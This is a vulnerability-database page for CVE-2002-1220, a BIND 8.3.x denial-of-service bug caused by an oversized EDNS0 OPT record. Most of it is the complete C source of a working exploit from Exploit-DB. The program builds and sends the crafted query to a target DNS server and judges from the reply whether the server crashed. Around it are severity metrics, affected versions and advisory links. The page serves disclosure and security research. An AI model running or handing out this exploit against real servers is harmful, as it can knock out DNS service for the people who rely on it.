CVE-2002-1220 : Detail

CVE-2002-1220

32.63%V3
Network
2004-09-01
02h00 +00:00
2004-08-03
22h00 +00:00

CVE Descriptions

BIND 8.3.x through 8.3.3 allows remote attackers to cause a denial of service (termination due to assertion failure) via a request for a subdomain that does not exist, with an OPT resource record with a large UDP payload size.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile has a higher EPSS score than 95% of all other CVEs and is therefore predicted to be more likely to be exploited. The percentile is thus a way to compare one CVE's EPSS score against the whole population of CVEs.

Exploit information

Exploit Database EDB-ID : 22011

Publication date : 2002-11-11 23h00 +00:00
Author : spybreak
EDB Verified : Yes

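// source: https://www.securityfocus.com/bid/6161/info
// ISC BIND is vulnerable to a denial of service attack. When a DNS lookup is
// requested on a non-existant sub-domain of a valid domain and an OPT resource
// record with a large UDP payload is attached, the server may fail.
/*
 * bind_optdos.c
 *
 * OPT DoS Remote Exploit for BIND 8.3.0 - 8.3.3-REL (CVE-2002-1220)
 * Based on the bug disclosed by ISS
 *
 * (c) Spybreak ([email protected]) November/2002
 *
 * Proof of concept exploit code
 * For educational and testing purposes only!
 *
 * Usage: ./bind_optdos domain target [udp_size]
 *
 *   domain   - should be a nonexistent subdomain of an existing one, different
 *              from the target's, or a domain whose authoritative name servers
 *              are unreachable
 *   target   - host name or IPv4 address of the BIND server under test
 *   udp_size - EDNS0 UDP payload size to advertise (0-65535, default 65535)
 *
 * The tool sends one recursive A query for DOMAIN carrying an OPT RR whose
 * UDP payload size is UDP_SIZE, then waits up to TIMEOUT seconds for a reply
 * that carries the same transaction ID. No reply (or port unreachable) is
 * taken as a sign the target died on the assertion; a reply means it
 * survived, is not a vulnerable version, or has recursion disabled.
 * Only run this against servers you are authorised to test.
 *
 * Greetz to: sd, g00bER and hysteria.sk ;-)
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <time.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>

#define UDP_SIZE 65535   /* default EDNS0 UDP payload size to advertise */
#define OPT      41      /* RR type OPT (EDNS0) */
#define PORT     53
#define MAXRESP  1024
#define TIMEOUT  10      /* seconds to wait for a reply */

#define DNS_FLAG_RD   0x0100 /* header flags with only "recursion desired" set */
#define DNS_HDR_LEN   12
#define DNS_NAME_MAX  255    /* wire-format name length limit */
#define DNS_LABEL_MAX 63
#define QTYPE_A       1
#define QCLASS_IN     1

/* Append V as a 16-bit big-endian (network order) value at *P and advance *P.
 * Byte-wise stores replace the original's `*((unsigned short *)bu)++` casts,
 * which are not valid C and perform unaligned, aliasing-violating writes. */
static void put16(unsigned char **p, unsigned v)
{
    *(*p)++ = (unsigned char)((v >> 8) & 0xff);
    *(*p)++ = (unsigned char)(v & 0xff);
}

/* Encode the dotted NAME in DNS wire format into OUT (capacity CAP): a
 * sequence of length-prefixed labels ended by a zero byte. One trailing dot
 * is tolerated. Returns the encoded length, or -1 if NAME is empty, contains
 * an empty label ("a..b", "a.."), has a label longer than DNS_LABEL_MAX, or
 * the encoding would exceed DNS_NAME_MAX or CAP. The original strncpy()-based
 * encoder validated none of this and could read past an unterminated buffer. */
static int encode_name(const char *name, unsigned char *out, size_t cap)
{
    size_t len = strlen(name);
    size_t total = 0;

    if (len > 0 && name[len - 1] == '.')
        len--;
    if (len == 0)
        return -1;

    while (len > 0) {
        const char *dot = memchr(name, '.', len);
        size_t lab = dot ? (size_t)(dot - name) : len;

        if (lab == 0 || lab > DNS_LABEL_MAX)
            return -1;
        /* length byte + label + the final terminator must still fit */
        if (total + 1 + lab + 1 > cap || total + 1 + lab + 1 > DNS_NAME_MAX)
            return -1;

        out[total++] = (unsigned char)lab;
        memcpy(out + total, name, lab);
        total += lab;
        name += lab;
        len -= lab;
        if (dot) {
            name++;
            len--;
            if (len == 0)   /* "a.." after trimming one trailing dot */
                return -1;
        }
    }
    out[total++] = 0;
    return (int)total;
}

/* Serialize into BUF (capacity CAP) a recursive A/IN query for NAME with
 * transaction ID id and one additional OPT pseudo-RR advertising UDP_SIZE as
 * the EDNS0 payload size (extended RCODE, version, flags and RDLEN all zero).
 * Returns the message length, or -1 if NAME is invalid or BUF is too small. */
static int build_query(const char *name, unsigned short id,
                       unsigned short udp_size, unsigned char *buf, size_t cap)
{
    unsigned char qname[DNS_NAME_MAX];
    unsigned char *p = buf;
    int qlen = encode_name(name, qname, sizeof qname);

    if (qlen < 0)
        return -1;
    /* header + QNAME + QTYPE/QCLASS + OPT RR (name 1, type 2, size 2, ttl 4, rdlen 2) */
    if (DNS_HDR_LEN + (size_t)qlen + 4 + 11 > cap)
        return -1;

    put16(&p, id);
    put16(&p, DNS_FLAG_RD);  /* explicit value: the original relied on bit-field layout */
    put16(&p, 1);            /* QDCOUNT */
    put16(&p, 0);            /* ANCOUNT */
    put16(&p, 0);            /* NSCOUNT */
    put16(&p, 1);            /* ARCOUNT: the OPT pseudo-RR */

    memcpy(p, qname, (size_t)qlen);
    p += qlen;
    put16(&p, QTYPE_A);
    put16(&p, QCLASS_IN);

    *p++ = 0;                /* OPT NAME: root */
    put16(&p, OPT);          /* TYPE */
    put16(&p, udp_size);     /* CLASS field carries the UDP payload size */
    put16(&p, 0);            /* TTL high half: extended RCODE + EDNS version */
    put16(&p, 0);            /* TTL low half: flags */
    put16(&p, 0);            /* RDLEN: no options */

    return (int)(p - buf);
}

/* Parse S as a decimal EDNS0 payload size in 0..65535 into *OUT.
 * Returns 0 on success, -1 on malformed input or an out-of-range value
 * (the original used atoi(), which silently accepted garbage and wrapped). */
static int parse_udp_size(const char *s, unsigned short *out)
{
    char *end;
    unsigned long v;

    if (*s == '\0' || *s == '-')    /* strtoul would wrap a negative value */
        return -1;
    errno = 0;
    v = strtoul(s, &end, 10);
    if (*end != '\0' || errno == ERANGE || v > 65535UL)
        return -1;
    *out = (unsigned short)v;
    return 0;
}

/* Print the banner and usage line, then exit with status 0 (as the original did). */
static void usage(const char *argv0)
{
    printf("********************************************\n"
           "* OPT DoS Exploit for BIND 8.3.[0-3] *\n"
           "* (c) Spybreak November/2002 *\n"
           "********************************************\n");
    printf("\n%s domain target [udp_size]\n\n", argv0);
    exit(0);
}

/* Entry point: validate arguments, resolve the target, send one probe query
 * and report whether a matching reply arrived within TIMEOUT seconds.
 * Exit status: 0 after a verdict (up or down), EXIT_FAILURE on bad input or
 * a socket error. */
int main(int argc, char **argv)
{
    unsigned short udp_size = UDP_SIZE;
    unsigned short id;
    unsigned char query[512];
    unsigned char response[MAXRESP];
    struct sockaddr_in target;
    struct hostent *he;
    struct timeval tv;
    int sockfd, qlen;
    ssize_t n;

    if (argc < 3)
        usage(argv[0]);
    if (argc == 4 && parse_udp_size(argv[3], &udp_size) < 0) {
        fprintf(stderr, "Invalid udp_size '%s' (expected 0-65535)\n", argv[3]);
        return EXIT_FAILURE;
    }

    he = gethostbyname(argv[2]);
    if (!he || he->h_addrtype != AF_INET ||
        he->h_length != (int)sizeof(struct in_addr) || !he->h_addr_list[0]) {
        printf("Invalid target '%s'\n", argv[2]);
        return EXIT_FAILURE;
    }

    printf("Query on domain: %s\nTarget: %s\n", argv[1], argv[2]);
    printf("EDNS UDP size: %u\n", (unsigned)udp_size);

    /* Transaction ID: only used to match the reply to this one probe. */
    srand((unsigned)time(NULL));
    id = (unsigned short)(rand() & 0xffff);

    qlen = build_query(argv[1], id, udp_size, query, sizeof query);
    if (qlen < 0) {
        fprintf(stderr, "Invalid domain '%s' (empty or over-long label/name)\n", argv[1]);
        return EXIT_FAILURE;
    }

    memset(&target, 0, sizeof target);
    target.sin_family = AF_INET;
    target.sin_port = htons(PORT);
    memcpy(&target.sin_addr, he->h_addr_list[0], sizeof target.sin_addr);

    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd < 0) {
        perror("socket");
        return EXIT_FAILURE;
    }
    /* connect() the UDP socket so only datagrams from the target are delivered
     * and an ICMP port-unreachable surfaces on recv() as ECONNREFUSED. */
    if (connect(sockfd, (struct sockaddr *)&target, sizeof target) < 0) {
        perror("connect");
        close(sockfd);
        return EXIT_FAILURE;
    }
    /* Bound the wait with a receive timeout instead of SIGALRM: the original
     * handler called printf()/exit(), which are not async-signal-safe. */
    tv.tv_sec = TIMEOUT;
    tv.tv_usec = 0;
    if (setsockopt(sockfd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof tv) < 0) {
        perror("setsockopt");
        close(sockfd);
        return EXIT_FAILURE;
    }

    n = send(sockfd, query, (size_t)qlen, 0);
    if (n < 0) {
        perror("send");
        close(sockfd);
        return EXIT_FAILURE;
    }
    printf("Datagram sent\nWaiting for response ...\n");

    /* Read until a reply carrying our transaction ID arrives or the timeout
     * expires; a stray datagram must not be mistaken for the server being up. */
    for (;;) {
        n = recv(sockfd, response, sizeof response, 0);
        if (n < 0) {
            if (errno == EAGAIN || errno == EWOULDBLOCK) {
                printf("No response yet, the target BIND seems to be down\n");
                close(sockfd);
                return 0;
            }
            if (errno == ECONNREFUSED) {
                printf("Port unreachable, the target BIND seems to be down\n");
                close(sockfd);
                return 0;
            }
            perror("recv");
            close(sockfd);
            return EXIT_FAILURE;
        }
        if (n >= 2 && (((unsigned)response[0] << 8) | response[1]) == id)
            break;
        printf("Ignoring datagram with unexpected transaction ID\n");
    }
    close(sockfd);

    printf("Response received, the target BIND seems to be still up\n");
    printf("Maybe the target is not an OPT DoS vulnerable BIND version,recursion disabled, or try to change domain/udp_size, ...\n");
    return 0;
}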

Products Mentioned

Configuration 0

Isc>>Bind >> Version 8.3.0

Isc>>Bind >> Version 8.3.1

Isc>>Bind >> Version 8.3.2

Isc>>Bind >> Version 8.3.3

Configuration 0

Freebsd>>Freebsd >> Version 4.4

Freebsd>>Freebsd >> Version 4.5

Freebsd>>Freebsd >> Version 4.6

Freebsd>>Freebsd >> Version 4.7

Openbsd>>Openbsd >> Version 3.0

Openbsd>>Openbsd >> Version 3.1

Openbsd>>Openbsd >> Version 3.2

References

http://www.cert.org/advisories/CA-2002-31.html
Tags : third-party-advisory, x_refsource_CERT
http://www.debian.org/security/2002/dsa-196
Tags : vendor-advisory, x_refsource_DEBIAN
http://online.securityfocus.com/advisories/4999
Tags : vendor-advisory, x_refsource_COMPAQ
http://marc.info/?l=bugtraq&m=103763574715133&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.kb.cert.org/vuls/id/229595
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.securityfocus.com/bid/6161
Tags : vdb-entry, x_refsource_BID
http://online.securityfocus.com/archive/1/300019
Tags : mailing-list, x_refsource_BUGTRAQ
http://marc.info/?l=bugtraq&m=103713117612842&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.ciac.org/ciac/bulletins/n-013.shtml
Tags : third-party-advisory, government-resource, x_refsource_CIAC
http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-077.php
Tags : vendor-advisory, x_refsource_MANDRAKE